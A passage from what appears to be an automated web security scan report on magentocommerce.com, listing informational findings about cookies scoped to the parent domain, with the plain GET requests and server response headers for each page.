Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176658; expires=Sat, 11-Aug-2012 15:17:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:38 GMT
Content-Length: 0

3.152. http://www.magentocommerce.com/trackback/2555/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2555/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2555/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176646; expires=Sat, 11-Aug-2012 15:17:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:26 GMT
Content-Length: 0

3.153. http://www.magentocommerce.com/trackback/2556/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2556/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2556/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176647; expires=Sat, 11-Aug-2012 15:17:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:27 GMT
Content-Length: 0

3.154. http://www.magentocommerce.com/trackback/2557/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2557/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2557/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176649; expires=Sat, 11-Aug-2012 15:17:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:30 GMT
Content-Length: 0

3.155. http://www.magentocommerce.com/trackback/2571/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2571/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2571/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176645; expires=Sat, 11-Aug-2012 15:17:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:25 GMT
Content-Length: 0

3.156. http://www.magentocommerce.com/trackback/323/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/323/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/323/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176669; expires=Sat, 11-Aug-2012 15:17:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:49 GMT
Content-Length: 0

3.157. http://www.magentocommerce.com/trackback/383/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/383/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/383/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176675; expires=Sat, 11-Aug-2012 15:17:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:56 GMT
Content-Length: 0

3.158. http://www.magentocommerce.com/trackback/446/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/446/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/446/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176671; expires=Sat, 11-Aug-2012 15:17:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:51 GMT
Content-Length: 0

3.159. http://www.magentocommerce.com/trackback/561/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/561/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/561/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176666; expires=Sat, 11-Aug-2012 15:17:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:46 GMT
Content-Length: 0

3.160. http://www.magentocommerce.com/trackback/625/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/625/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/625/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176667; expires=Sat, 11-Aug-2012 15:17:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:47 GMT
Content-Length: 0

3.161. http://www.magentocommerce.com/trackback/713/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/713/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/713/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176654; expires=Sat, 11-Aug-2012 15:17:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:34 GMT
Content-Length: 0

3.162. http://www.magentocommerce.com/trackback/892/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/892/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/892/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176650; expires=Sat, 11-Aug-2012 15:17:30 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:30 GMT
Content-Length: 0

3.163. http://www.magentocommerce.com/translations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.164. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.165. http://www.magentocommerce.com/vi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.166. http://www.magentocommerce.com/virtual/download-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.167. http://www.magentocommerce.com/virtual/enterprise-register/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.168. http://www.magentocommerce.com/whitepaper/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.169. http://www.magentocommerce.com/wiki  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /wiki

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wiki HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
